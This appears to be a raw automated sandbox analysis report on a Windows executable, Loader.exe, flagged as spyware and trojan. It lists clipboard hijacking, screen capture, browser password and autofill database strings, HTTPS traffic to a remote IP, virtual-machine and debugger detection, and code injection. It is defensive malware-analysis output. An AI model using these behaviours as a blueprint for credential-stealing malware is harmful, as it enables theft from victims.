Source: Loader.exe, 00000003.00000003.91089795795.0000000006398000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-GB/contribute/gro.allizom.www.
Source: Loader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-release
Source: Loader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-releasehttps://www.mozilla.org/en-GB/fire
Source: Loader.exe, 00000003.00000003.91089795795.0000000006398000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-GB/firefox/central/gro.allizom.www.
Source: Loader.exe, 00000003.00000003.91089795795.0000000006398000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-GB/privacy/firefox/gro.allizom.www.
Source: Loader.exe, 00000003.00000003.91089795795.0000000006398000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: Loader.exe, 00000003.00000003.91089795795.0000000006398000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpgk
Source: Loader.exe, 00000003.00000003.91089795795.0000000006398000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756

Source: unknown	HTTPS traffic detected: 172.67.157.249:443 -> 192.168.11.20:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.249:443 -> 192.168.11.20:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.249:443 -> 192.168.11.20:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.249:443 -> 192.168.11.20:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.249:443 -> 192.168.11.20:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.249:443 -> 192.168.11.20:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.249:443 -> 192.168.11.20:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.249:443 -> 192.168.11.20:49762 version: TLS 1.2

Source: C:\Users\user\Desktop\Loader.exe

Code function: 3_2_00431B60 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

3_2_00431B60

Source: C:\Users\user\Desktop\Loader.exe

Code function: 3_2_05C91000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,

3_2_05C91000

Source: C:\Users\user\Desktop\Loader.exe

Code function: 3_2_00431B60 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

3_2_00431B60

Source: C:\Users\user\Desktop\Loader.exe

Code function: 3_2_00432538 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

3_2_00432538

Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00CDEA8E	0_2_00CDEA8E
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00CD3440	0_2_00CD3440
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00CCDDE2	0_2_00CCDDE2
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00CE0502	0_2_00CE0502
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00CC96DB	0_2_00CC96DB
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0043E840	3_2_0043E840
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0040A1F2	3_2_0040A1F2
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004372C0	3_2_004372C0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00421A9F	3_2_00421A9F
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0043F2A0	3_2_0043F2A0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0040AB40	3_2_0040AB40
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00418B32	3_2_00418B32
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0040E460	3_2_0040E460
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0043AC60	3_2_0043AC60
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00410D78	3_2_00410D78
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004375F0	3_2_004375F0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004256E0	3_2_004256E0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00408680	3_2_00408680
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004196A0	3_2_004196A0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004227C0	3_2_004227C0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0041C06C	3_2_0041C06C
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0043E010	3_2_0043E010
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0042C836	3_2_0042C836
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0040B0C0	3_2_0040B0C0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0043E0D0	3_2_0043E0D0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0042E890	3_2_0042E890
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00403940	3_2_00403940
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0042B94C	3_2_0042B94C
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0043B160	3_2_0043B160
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0043E160	3_2_0043E160
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00426170	3_2_00426170
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00427909	3_2_00427909
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00414910	3_2_00414910
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0043511D	3_2_0043511D
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004371E0	3_2_004371E0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0041E9F8	3_2_0041E9F8
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00405980	3_2_00405980
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00438990	3_2_00438990
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004089A0	3_2_004089A0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004119B2	3_2_004119B2
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0041BA45	3_2_0041BA45
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00422266	3_2_00422266
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00406270	3_2_00406270
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00408A70	3_2_00408A70
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0042327B	3_2_0042327B
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00436A00	3_2_00436A00
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0042820E	3_2_0042820E
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00428A33	3_2_00428A33
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004042F0	3_2_004042F0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00426AF9	3_2_00426AF9
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00422280	3_2_00422280
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00408290	3_2_00408290
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004382A0	3_2_004382A0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00409330	3_2_00409330
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00438BF8	3_2_00438BF8
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00417B87	3_2_00417B87
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0042FB90	3_2_0042FB90
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0043EB90	3_2_0043EB90
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00402BA0	3_2_00402BA0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0041D440	3_2_0041D440
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00436C60	3_2_00436C60
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00435C00	3_2_00435C00
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00421410	3_2_00421410
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00404C20	3_2_00404C20
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0043E4C0	3_2_0043E4C0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00425CD9	3_2_00425CD9
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004074E0	3_2_004074E0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004284F0	3_2_004284F0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00415480	3_2_00415480
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00423488	3_2_00423488
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0041CCA0	3_2_0041CCA0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00424D50	3_2_00424D50
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0043DD50	3_2_0043DD50
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0041BD60	3_2_0041BD60
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00426565	3_2_00426565
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0041FD70	3_2_0041FD70
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00414D12	3_2_00414D12
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0042ED3C	3_2_0042ED3C
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00424DD0	3_2_00424DD0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004275D8	3_2_004275D8
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0043B580	3_2_0043B580
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0042B66B	3_2_0042B66B
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0041A670	3_2_0041A670
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00435601	3_2_00435601
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0043D621	3_2_0043D621
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0043DEC0	3_2_0043DEC0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00405ED0	3_2_00405ED0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00418683	3_2_00418683
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00402F40	3_2_00402F40
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00431750	3_2_00431750
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00426F6C	3_2_00426F6C
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00409770	3_2_00409770
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00406700	3_2_00406700
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0041D700	3_2_0041D700
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0041770C	3_2_0041770C
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0043EF10	3_2_0043EF10
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00437F20	3_2_00437F20
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00415F2D	3_2_00415F2D
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004277C5	3_2_004277C5
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00408FF0	3_2_00408FF0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0041F785	3_2_0041F785
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00CDEA8E	3_2_00CDEA8E
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00CD3440	3_2_00CD3440
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00CCDDE2	3_2_00CCDDE2
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00CE0502	3_2_00CE0502
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00CC96DB	3_2_00CC96DB

Source: C:\Users\user\Desktop\Loader.exe	Code function: String function: 00CD1D28 appears 42 times
Source: C:\Users\user\Desktop\Loader.exe	Code function: String function: 00CC9BF0 appears 94 times
Source: C:\Users\user\Desktop\Loader.exe	Code function: String function: 00408070 appears 49 times
Source: C:\Users\user\Desktop\Loader.exe	Code function: String function: 00414900 appears 70 times
Source: C:\Users\user\Desktop\Loader.exe	Code function: String function: 00CD670D appears 34 times

Source: Loader.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Loader.exe	Static PE information: Section: .BSS ZLIB complexity 1.000330982592282
Source: Loader.exe	Static PE information: Section: .BSS ZLIB complexity 1.000330982592282

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/0@1/1

Source: C:\Users\user\Desktop\Loader.exe

Code function: 3_2_004375F0 RtlExpandEnvironmentStrings,RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

3_2_004375F0

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4488:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4488:120:WilError_03

Source: Loader.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Loader.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Loader.exe, 00000003.00000003.91061190974.0000000005E9E000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91061092104.0000000006033000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
Source: Loader.exe, 00000003.00000003.91074609704.0000000005E4C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91061837230.0000000005E60000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91062365302.0000000005E49000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91075220023.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91075830816.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91074354314.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91087642518.0000000005E5F000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91061681849.0000000006036000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91074733940.0000000005E59000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Loader.exe, 00000003.00000003.91074970558.0000000005E63000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91075395661.000000000604A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;

Source: Loader.exe

ReversingLabs: Detection: 29%

Source: C:\Users\user\Desktop\Loader.exe

File read: C:\Users\user\Desktop\Loader.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"
Source: C:\Users\user\Desktop\Loader.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Loader.exe	Process created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"
Source: C:\Users\user\Desktop\Loader.exe	Process created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: Loader.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Loader.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Loader.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Loader.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Loader.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00CC9DAA push ecx; ret	0_2_00CC9DBD
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00CF1641 push ss; iretd	0_2_00CF1642
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00CF1621 push ss; iretd	0_2_00CF1622
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00CF1631 push ss; iretd	0_2_00CF1632
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004440E1 push esi; retf 0000h	3_2_004440E2
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004479AD push eax; iretd	3_2_004479AE
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0043DD10 push eax; mov dword ptr [esp], 89888F5Eh	3_2_0043DD11
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00CC9DAA push ecx; ret	3_2_00CC9DBD

Source: C:\Users\user\Desktop\Loader.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\Loader.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\Loader.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe

Window / User API: threadDelayed 9968

Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe TID: 7568	Thread sleep time: -30000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe TID: 6732	Thread sleep count: 9968 > 30			Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\Loader.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\Loader.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00CDB6E8 FindFirstFileExW,	0_2_00CDB6E8
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00CDB799 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00CDB799
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00CDB6E8 FindFirstFileExW,	3_2_00CDB6E8
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00CDB799 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	3_2_00CDB799

Source: Loader.exe, 00000003.00000002.96102694603.000000000335C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWX
Source: Loader.exe, 00000003.00000003.91118614146.0000000003399000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91781075623.0000000003399000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91778841405.0000000003399000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91058782608.0000000003399000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.96103019944.000000000339C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91105992992.0000000003399000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91127781720.0000000003399000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW3
Source: Loader.exe, 00000003.00000003.91118614146.0000000003399000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91781075623.0000000003399000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91778841405.0000000003399000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91058782608.0000000003399000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.96103019944.000000000339C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91105992992.0000000003399000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91127781720.0000000003399000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\Loader.exe

API call chain: ExitProcess graph end node

graph_3-30073

Source: C:\Users\user\Desktop\Loader.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe

Code function: 3_2_0043C680 LdrInitializeThunk,

3_2_0043C680

Source: C:\Users\user\Desktop\Loader.exe

Code function: 0_2_00CD1A60 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00CD1A60

Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00CF019E mov edi, dword ptr fs:[00000030h]	0_2_00CF019E
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00CC1BA0 mov edi, dword ptr fs:[00000030h]	0_2_00CC1BA0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00CC1BA0 mov edi, dword ptr fs:[00000030h]	3_2_00CC1BA0

Source: C:\Users\user\Desktop\Loader.exe

Code function: 0_2_00CD7020 GetProcessHeap,

0_2_00CD7020

Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00CC9A67 SetUnhandledExceptionFilter,	0_2_00CC9A67
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00CD1A60 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00CD1A60
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00CC9A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00CC9A73
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00CC96B3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00CC96B3
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00CC9A67 SetUnhandledExceptionFilter,	3_2_00CC9A67
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00CD1A60 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00CD1A60
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00CC9A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00CC9A73
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00CC96B3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00CC96B3

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\Loader.exe

